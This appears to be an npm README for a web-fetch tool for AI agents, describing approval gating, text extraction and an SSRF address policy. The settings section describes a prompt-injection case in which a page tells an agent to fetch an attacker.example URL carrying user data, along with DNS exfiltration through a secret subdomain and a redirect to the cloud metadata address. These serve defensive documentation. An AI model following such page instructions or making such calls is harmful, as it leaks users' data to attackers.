@stratusagent/tool-web
v0.11.10
Published
Web fetching for Stratus agents: retrieve a URL as readable text, with no browser and a shared address policy
Maintainers
Readme
@stratusagent/tool-web
web.fetch: retrieve a URL and get back the text a reader would keep. No
browser, no JavaScript, no Chromium — this is what an agent reaches for
twenty times for every once it needs browser.*.
Install and enable
npm install @stratusagent/tool-web// ~/.stratus/config.json — a trusted config only
{
"plugins": {
"@stratusagent/tool-web": { "enabled": true }
}
}Then the agent's soul decides, per identity:
---
id: blair
tools: [web.fetch]
---Risk model
| Tool | Risk | What approval mode does |
| --- | --- | --- |
| web.fetch | gated | interactive asks at the terminal, remote asks in Slack, headless refuses. It reaches a service outside Stratus at an address the agent chose, which is the line 03 draws. Judged per site: Always allow grants the URL's origin, not every URL, and a redirect to another site is returned as redirectedTo instead of followed. |
Every result is labelled external: the body and the page-supplied title
are a document somebody else wrote, and the session that read it — and
every fact it remembers afterwards — carries the label
(Memory).
Approval decides whether; the address policy decides where, and it is
not the same question. An approver looking at https://example.com/report
has approved that URL — not the redirect it answers with.
What the text leaves out
Scripts, styles, svg and canvas, frames, navigation, headers, footers,
asides, and forms are dropped whole, and block boundaries become line
breaks. So is what a browser would not show — an element with the
hidden attribute (unless its inline style sets display again) or an
inline style of display: none, visibility: hidden, or
content-visibility: hidden (which, like hidden="until-found", hides
nothing on an inline element such as a span, as in a browser) — and
what it withholds from a screen reader, aria-hidden="true". That is to match what a reader of the rendered page
gets, not a defence against prompt injection: text hidden by a
stylesheet, a class, or a zero font size still comes through, which is
why every result is labelled external. raw: true returns the body as
received.
Each element is judged where a browser's parser puts it, misnested and
unclosed markup included, so text moved out of a hidden element is kept
and text moved into one is not. The tests hold this to Chromium: some
1,700 pages, hand-written and generated, with what Chromium shows of each
recorded in test/rendered-in-chromium.json
by scripts/render-in-chromium.ts.
Two exceptions are deliberate, and both keep text a browser would not
show: an element still open at the end of the page keeps what it holds,
so a closing rule this extraction does not model cannot erase the
article after it; and a hidden html or body hides nothing, because a
page that hides its whole document until a script runs is showing all of
it — hiding everything hides nothing from a reader that the page shows
anyone else.
Settings
| Key | Default | What |
| --- | --- | --- |
| allowedHosts | none | Hosts exempt from the address check, by name or literal address. The narrow override: one internal service an agent is meant to reach. |
| allowPrivateAddresses | false | Reach any non-global address. The trusted-workstation posture — it turns the SSRF protection off rather than adjusting it. |
| onlyHosts | unset (every public host) | The only hosts web.fetch may reach, by name or literal address, or *.example.com for every subdomain (the apex is its own entry). Every redirect hop is checked against it, and a refused name is never looked up. allowedHosts entries stay reachable. Under agents, ["*"] lifts a list the agent would otherwise inherit. |
| maxBytes | 400000 | Stop reading here; the result says truncated. A call's own maxBytes may ask for less, never more. |
| timeoutMs | 20000 | Give up on the whole exchange — every redirect hop draws on the one budget. |
| maxRedirects | 5 | Hops to follow before refusing. |
| userAgent | StratusAgent/0.5 … | What to send. |
All of them can be set per agent under agents, and allowedHosts in
particular should be: an exemption written once at the top level is an
exemption every agent gets.
onlyHosts is the one setting that narrows rather than widens, and it
answers a different question from the address check. That check keeps an
agent's requests off your machine and network; onlyHosts keeps what the
agent has read from leaving it. A page can tell an agent to fetch
https://attacker.example/?d=<what you showed it>, and a URL to any public
host carries it — so an agent that reads untrusted pages and holds anything
worth taking should have a list. A name outside it is refused before it is
looked up, because a DNS query for <secret>.attacker.example delivers the
secret to that zone's nameserver whether or not anything connects.
What it refuses, and where
The address policy is @stratusagent/egress, the same module
@stratusagent/tool-browser uses — not a copy of it. A second
implementation would not drift into a style difference; the stale one would
be an SSRF hole. Both packs are tested against the same table of hostile
URLs, which is what fails if the module is ever forked.
- Schemes:
http:andhttps:.file:,data:, andjavascript:are refused before anything is fetched — this process can read the files afile:URL names. - Addresses: every non-global address in both families — loopback, RFC 1918, carrier-NAT, link-local (where cloud instance metadata lives), IPv6 unique-local and link-local, multicast, and the IPv4-mapped, NAT64, and 6to4 forms that write the same addresses a different way.
- Every hop: redirects are followed one at a time and each one faces the
policy from scratch, so a public URL that answers
302 Location: http://169.254.169.254/is a refusal rather than a fetch. - The connection itself: the socket's own DNS resolution is the one that gets checked. Resolving a name to validate it and letting the client resolve it again to connect is DNS rebinding with extra steps.
